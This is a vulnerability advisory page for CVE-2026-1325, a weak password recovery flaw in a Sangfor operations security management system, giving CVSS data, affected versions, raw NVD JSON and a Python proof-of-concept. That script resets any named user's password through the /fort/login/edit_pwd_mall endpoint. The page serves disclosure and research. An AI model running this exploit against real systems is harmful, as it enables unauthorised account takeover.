Security Vulnerability Report
中文
CVE-2026-1325 CVSS 5.3 MEDIUM

CVE-2026-1325

Published: 2026-01-22 15:16:51
Last Modified: 2026-01-30 16:37:09
Source: [email protected]

Description

A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sangfor:operation_and_maintenance_security_management_system:*:*:*:*:*:*:*:* - VULNERABLE
Sangfor Operation and Maintenance Security Management System <= 3.0.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-1325 PoC - Sangfor Operation and Maintenance Security Management System # Weak Password Recovery via flag parameter manipulation in /fort/login/edit_pwd_mall def exploit(target_url, username): """ Exploit weak password recovery in Sangfor system Args: target_url: Target system URL (e.g., http://target.com) username: Target username to reset password """ endpoint = f"{target_url}/fort/login/edit_pwd_mall" # Payload: Manipulate flag parameter to trigger weak password recovery payload = { "flag": "1", # Manipulated flag value to bypass validation "username": username, "new_password": "P@ssw0rd123!" # Attacker's chosen password } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } try: print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting endpoint: {endpoint}") print(f"[*] Attempting password reset for user: {username}") response = requests.post(endpoint, data=payload, headers=headers, timeout=10, verify=False) if response.status_code == 200: if "success" in response.text.lower() or "success" in response.text: print(f"[+] SUCCESS: Password reset triggered for {username}") print(f"[+] New password set to: P@ssw0rd123!") return True else: print(f"[-] Response received but password reset may not have succeeded") print(f"[-] Status: {response.status_code}") return False else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <username>") print(f"Example: python {sys.argv[0]} http://192.168.1.100 admin") sys.exit(1) target = sys.argv[1] user = sys.argv[2] exploit(target, user)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1325", "sourceIdentifier": "[email protected]", "published": "2026-01-22T15:16:50.610", "lastModified": "2026-01-30T16:37:09.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en el Sistema de Gestión de Seguridad de Operación y Mantenimiento de Sangfor hasta la versión 3.0.12. Esto afecta la función edit_pwd_mall del archivo /fort/login/edit_pwd_mall. La manipulación del argumento flag resulta en una recuperación de contraseña débil. Es posible lanzar el ataque de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sangfor:operation_and_maintenance_security_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.0.12", "matchCriteriaId": "B2514FE4-F7D8-46CC-9ACF-FC9B7433599F"}]}]}], "references": [{"url": "https://github.com/LX-LX88/cve/issues/21", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.342301", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"] ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.